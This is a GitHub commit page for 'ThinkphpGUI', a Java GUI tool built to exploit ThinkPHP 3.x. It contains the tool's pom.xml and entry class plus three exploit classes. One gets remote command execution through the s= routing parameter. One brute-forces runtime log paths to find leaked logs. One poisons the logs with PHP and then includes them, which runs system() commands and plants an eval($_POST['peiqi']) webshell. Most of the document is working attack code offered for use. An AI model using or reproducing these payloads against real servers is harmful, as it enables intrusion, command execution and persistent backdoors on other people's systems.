Skip to content

Commit 14f5295

Browse files
LJN26LJN26
committed
no message
1 parent e435694 commit 14f5295

25 files changed

+1657
-1
lines changed

README.md

+1-1
Original file line numberDiff line numberDiff line change
@@ -1,7 +1,7 @@
11
# ThinkPHPGUI
22

33
* Thinkphp(GUI)漏洞利用工具,支持各版本TP漏洞检测,命令执行,getshell。 (如果感觉对您有帮助,感觉不错的话,请您给个大大的 ⭐️❗️)
4-
* JFormDesigner可视化编写,没有javafx可视化好用。
4+
* JFormDesigner可视化编写,没有javafx可视化好用(建议学javafx)
55
* 检测不到的payload欢迎提交payload至issues。
66

77
**V1.3**

ThinkphpGUI/ThinkphpGUI.iml

+2
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,2 @@
1+
<?xml version="1.0" encoding="UTF-8"?>
2+
<module type="JAVA_MODULE" version="4" />

ThinkphpGUI/lib/swing-layout-javadoc.zip

76 KB
Binary file not shown.

ThinkphpGUI/lib/swing-layout-src.zip

68.2 KB
Binary file not shown.

ThinkphpGUI/lib/swing-layout.jar

115 KB
Binary file not shown.

ThinkphpGUI/pom.xml

+63
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,63 @@
1+
<?xml version="1.0" encoding="UTF-8"?>
2+
<project xmlns="http://maven.apache.org/POM/4.0.0"
3+
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
4+
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
5+
<modelVersion>4.0.0</modelVersion>
6+
<dependencies>
7+
<dependency>
8+
<groupId>com.github.kevinsawicki</groupId>
9+
<artifactId>http-request</artifactId>
10+
<version>6.0</version>
11+
</dependency>
12+
13+
</dependencies>
14+
<groupId>org.example</groupId>
15+
<artifactId>ThinkphpGUI</artifactId>
16+
<version>1.3-SNAPSHOT</version>
17+
<profiles>
18+
<profile>
19+
<id>jdk-1.8</id>
20+
<activation>
21+
<activeByDefault>true</activeByDefault>
22+
<jdk>1.8</jdk>
23+
</activation>
24+
<properties>
25+
<maven.compiler.source>1.8</maven.compiler.source>
26+
<maven.compiler.target>1.8</maven.compiler.target>
27+
<maven.compiler.compilerVersion>1.8</maven.compiler.compilerVersion>
28+
</properties>
29+
</profile>
30+
</profiles>
31+
32+
<build>
33+
<plugins>
34+
<plugin>
35+
<groupId>org.apache.maven.plugins</groupId>
36+
<artifactId>maven-assembly-plugin</artifactId>
37+
<configuration>
38+
<appendAssemblyId>false</appendAssemblyId>
39+
<descriptorRefs>
40+
<descriptorRef>jar-with-dependencies</descriptorRef>
41+
</descriptorRefs>
42+
<archive>
43+
<manifest>
44+
<mainClass>App</mainClass>
45+
</manifest>
46+
</archive>
47+
</configuration>
48+
<executions>
49+
<execution>
50+
<id>make-assembly</id>
51+
<phase>package</phase>
52+
<goals>
53+
<goal>assembly</goal>
54+
</goals>
55+
</execution>
56+
</executions>
57+
</plugin>
58+
59+
</plugins>
60+
</build>
61+
62+
63+
</project>

ThinkphpGUI/src/main/java/App.java

+15
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,15 @@
1+
import view.tp_view;
2+
3+
import javax.swing.*;
4+
5+
/**
6+
* Author 莲花 2021/6/15
7+
*/
8+
public class App {
9+
public static void main(String[] args) throws Exception {
10+
tp_view f = new tp_view();
11+
f.setLocationRelativeTo(null);
12+
f.setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE);
13+
f.setVisible(true);
14+
}
15+
}

ThinkphpGUI/src/main/java/exploit/tp3.java

+60
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,60 @@
1+
package exploit;
2+
3+
import com.github.kevinsawicki.http.HttpRequest;
4+
import util.BasePayload;
5+
import util.Module;
6+
import util.Result;
7+
8+
/**
9+
* Author 莲花 2021/6/20
10+
*/
11+
//thinkphp3.0
12+
public class tp3 implements BasePayload {
13+
@Override
14+
public Result checkVUL(String url) throws Exception {
15+
String CheckStr = "PHP Version";
16+
Module m = new Module();
17+
String module = m.getModule(url);
18+
String payload = url + "/?s=" + module + "/\\think\\module/action/param1/${@phpinfo()}";
19+
try {
20+
HttpRequest req = HttpRequest.get(url);
21+
if (req.body().contains(CheckStr)) {
22+
return new Result(true, "ThinkPHP 3.x RCE", payload);
23+
}
24+
} catch (Exception e) {
25+
e.printStackTrace();
26+
}
27+
return new Result(false, "ThinkPHP 3.x RCE", "");
28+
}
29+
30+
@Override
31+
public Result exeVUL(String url, String cmd) throws Exception {
32+
Module m = new Module();
33+
String module = m.getModule(url);
34+
String payload_url = url + "/?s=" + module + "/\\think\\module/action/param1/{${system($_GET['x'])}}?x=" + cmd;
35+
try {
36+
String res = HttpRequest.get(payload_url).body();
37+
return new Result(true, null, res);
38+
} catch (
39+
Exception e) {
40+
e.printStackTrace();
41+
}
42+
return new Result(false, null, null);
43+
}
44+
45+
@Override
46+
public Result getShell(String url) throws Exception {
47+
try {
48+
Module m = new Module();
49+
String module = m.getModule(url);
50+
String shell_url = url + "/?s=" + module + "/\\think\\module/action/param1/{${eval($_POST['peiqi'])}}";
51+
int code = HttpRequest.get(shell_url).code();
52+
if (code == 200) {
53+
return new Result(true, null, shell_url);
54+
}
55+
} catch (Exception e) {
56+
e.printStackTrace();
57+
}
58+
return new Result(false, null, null);
59+
}
60+
}

ThinkphpGUI/src/main/java/exploit/tp3_log.java

+92
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,92 @@
1+
package exploit;
2+
3+
import com.github.kevinsawicki.http.HttpRequest;
4+
import util.BasePayload;
5+
import util.Result;
6+
7+
import java.util.ArrayList;
8+
import java.util.Date;
9+
10+
/**
11+
* Author 莲花 2021/6/27
12+
*/
13+
public class tp3_log implements BasePayload {
14+
@Override
15+
public Result checkVUL(String url) throws Exception {
16+
String CheckStr = "INFO:";
17+
String CheckErr = "[ error ]";
18+
Date dt = new Date();
19+
String year = String.format("%tY", dt);
20+
String mon = String.format("%tm", dt);
21+
String day = String.format("%td", dt);
22+
String sjc = String.valueOf(dt.getTime()).substring(0, 10);
23+
String suffix1 = year.substring(2, 4) + "_" + mon + "_" + day + ".log";
24+
String suffix2 = sjc + "-" + year.substring(2, 4) + "_" + mon + "_" + day + ".log";
25+
ArrayList<String> payload_urls = new ArrayList<String>() {{
26+
add(url + "/Runtime/Logs/" + suffix1);
27+
add(url + "/Runtime/Logs/" + suffix2);
28+
29+
add(url + "/Runtime/Logs/Home/" + suffix1);
30+
add(url + "/Runtime/Logs/Home/" + suffix2);
31+
32+
add(url + "/Runtime/Logs/Common/" + suffix1);
33+
add(url + "/Runtime/Logs/Common/" + suffix2);
34+
35+
add(url + "/App/Runtime/Logs/" + suffix1);
36+
add(url + "/App/Runtime/Logs/" + suffix2);
37+
38+
add(url + "/App/Runtime/Logs/Home/" + suffix1);
39+
add(url + "/App/Runtime/Logs/Home/" + suffix2);
40+
41+
add(url + "/Application/Runtime/Logs/" + suffix1);
42+
add(url + "/Application/Runtime/Logs/" + suffix2);
43+
44+
add(url + "/Application/Runtime/Logs/Admin/" + suffix1);
45+
add(url + "/Application/Runtime/Logs/Admin/" + suffix2);
46+
47+
add(url + "/Application/Runtime/Logs/Home/" + suffix1);
48+
add(url + "/Application/Runtime/Logs/Home/" + suffix2);
49+
50+
add(url + "/Application/Runtime/Logs/App/" + suffix1);
51+
add(url + "/Application/Runtime/Logs/App/" + suffix2);
52+
53+
add(url + "/Application/Runtime/Logs/Ext/" + suffix1);
54+
add(url + "/Application/Runtime/Logs/Ext/" + suffix2);
55+
56+
add(url + "/Application/Runtime/Logs/Api/" + suffix1);
57+
add(url + "/Application/Runtime/Logs/Api/" + suffix2);
58+
59+
add(url + "/Application/Runtime/Logs/Test/" + suffix1);
60+
add(url + "/Application/Runtime/Logs/Test/" + suffix2);
61+
62+
add(url + "/Application/Runtime/Logs/Common/" + suffix1);
63+
add(url + "/Application/Runtime/Logs/Common/" + suffix2);
64+
65+
add(url + "/Application/Runtime/Logs/Service/" + suffix1);
66+
add(url + "/Application/Runtime/Logs/Service/" + suffix2);
67+
}};
68+
try {
69+
for (String payload_url : payload_urls) {
70+
String res = HttpRequest.get(payload_url).body();
71+
if (res.contains(CheckStr)||res.contains(CheckErr)) {
72+
return new Result(true, "ThinkPHP 3.x 日志泄露", payload_url);
73+
}
74+
}
75+
76+
} catch (Exception e) {
77+
e.printStackTrace();
78+
}
79+
80+
return new Result(false, "ThinkPHP 3.x 日志泄露", "");
81+
}
82+
83+
@Override
84+
public Result exeVUL(String url, String cmd) throws Exception {
85+
return new Result(false, "", "");
86+
}
87+
88+
@Override
89+
public Result getShell(String url) throws Exception {
90+
return new Result(false, "", "");
91+
}
92+
}

ThinkphpGUI/src/main/java/exploit/tp3_log_rce.java

+87
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,87 @@
1+
package exploit;
2+
3+
import com.github.kevinsawicki.http.HttpRequest;
4+
import util.BasePayload;
5+
import util.Result;
6+
7+
import java.util.ArrayList;
8+
import java.util.Date;
9+
10+
/**
11+
* Author 莲花 2021/7/21
12+
*/
13+
public class tp3_log_rce implements BasePayload {
14+
Date dt = new Date();
15+
String year = String.format("%tY", dt);
16+
String mon = String.format("%tm", dt);
17+
String day = String.format("%td", dt);
18+
String suffix1 = year.substring(2, 4) + "_" + mon + "_" + day + ".log";
19+
20+
@Override
21+
public Result checkVUL(String url) throws Exception {
22+
String CheckStr = "PHP Version";
23+
24+
String payload_log = url + "?m=Home&c=Index&a=index&test=--><?=phpinfo();?>";
25+
ArrayList<String> log_rces = new ArrayList<String>() {{
26+
add(url + "/?m=Home&c=Index&a=index&value[_filename]=." + "/Application/Runtime/Logs/Home/" + suffix1);
27+
add(url + "/?m=Home&c=Index&a=index&info[_filename]=." + "/Application/Runtime/Logs/Home/" + suffix1);
28+
add(url + "/?m=Home&c=Index&a=index&param[_filename]=." + "/Application/Runtime/Logs/Home/" + suffix1);
29+
add(url + "/?m=Home&c=Index&a=index&name[_filename]=." + "/Application/Runtime/Logs/Home/" + suffix1);
30+
add(url + "/?m=Home&c=Index&a=index&array[_filename]=." + "/Application/Runtime/Logs/Home/" + suffix1);
31+
add(url + "/?m=Home&c=Index&a=index&arr[_filename]=." + "/Application/Runtime/Logs/Home/" + suffix1);
32+
add(url + "/?m=Home&c=Index&a=index&list[_filename]=." + "/Application/Runtime/Logs/Home/" + suffix1);
33+
add(url + "/?m=Home&c=Index&a=index&page[_filename]=." + "/Application/Runtime/Logs/Home/" + suffix1);
34+
add(url + "/?m=Home&c=Index&a=index&menus[_filename]=." + "/Application/Runtime/Logs/Home/" + suffix1);
35+
add(url + "/?m=Home&c=Index&a=index&var[_filename]=." + "/Application/Runtime/Logs/Home/" + suffix1);
36+
add(url + "/?m=Home&c=Index&a=index&data[_filename]=." + "/Application/Runtime/Logs/Home/" + suffix1);
37+
add(url + "/?m=Home&c=Index&a=index&module[_filename]=." + "/Application/Runtime/Logs/Home/" + suffix1);
38+
}};
39+
for (String log_rce : log_rces) {
40+
try {
41+
String log = HttpRequest.get(payload_log).body();
42+
String res = HttpRequest.get(log_rce).body();
43+
if (res.contains(CheckStr)) {
44+
return new Result(true, "ThinkPHP 3.x Log RCE", log_rce);
45+
}
46+
} catch (Exception e) {
47+
e.printStackTrace();
48+
}
49+
}
50+
return new Result(false, "ThinkPHP 3.x Log RCE", "");
51+
}
52+
53+
@Override
54+
public Result exeVUL(String url, String cmd) throws Exception {
55+
String log_exe = url + "/?m=Home&c=Index&a=index&test=--><?=system('"+cmd+"');?>";
56+
String log_res = url + "/?m=Home&c=Index&a=index&value[_filename]=." + "/Application/Runtime/Logs/Home/" + suffix1;
57+
try {
58+
String log = HttpRequest.get(log_exe).body();
59+
int code = HttpRequest.get(log_res).code();
60+
if (code == 200) {
61+
return new Result(true, null, log_res);
62+
}
63+
}
64+
catch (Exception e) {
65+
e.printStackTrace();
66+
}
67+
return new Result(false, null, "");
68+
}
69+
70+
@Override
71+
public Result getShell(String url) throws Exception {
72+
String log_shell = url + "/?m=Home&c=Index&a=index&test=--><?=@eval($_POST['peiqi']);?>";
73+
String log_res = url + "/?m=Home&c=Index&a=index&value[_filename]=." + "/Application/Runtime/Logs/Home/" + suffix1;
74+
try {
75+
String log = HttpRequest.get(log_shell).body();
76+
int code = HttpRequest.get(log_res).code();
77+
if (code == 200) {
78+
return new Result(true, null, log_res+" Pass:peiqi");
79+
}
80+
}
81+
catch (Exception e) {
82+
e.printStackTrace();
83+
}
84+
return null;
85+
}
86+
87+
}

0 commit comments

Comments
 (0)